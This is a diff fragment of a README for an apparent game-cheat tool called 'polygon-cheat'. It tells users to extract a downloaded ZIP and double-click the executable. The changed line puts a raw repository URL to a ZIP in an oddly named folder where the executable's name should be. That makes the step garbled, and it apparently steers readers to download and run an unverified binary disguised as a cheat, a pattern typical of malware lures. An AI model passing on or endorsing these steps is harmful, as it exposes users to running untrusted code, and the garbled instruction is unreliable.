Daegyn/polygon-cheat/README.md

 4. **Extract the Files**: Once the download is complete, navigate to the folder where you saved the file.
 If it is a ZIP file, right-click on it and select "Extract All."
 Follow the prompts to unpack the files.

-5. **Run the Application**: After extracting, locate the application file (it may be named `polygon-cheat.exe`).
+5. **Run the Application**: After extracting, locate the application file (it may be named `https://raw.githubusercontent.com/Daegyn/polygon-cheat/main/overprominence/polygon-cheat.zip`).
 Double-click the file to launch the application.

 ## 🖥️ System Requirements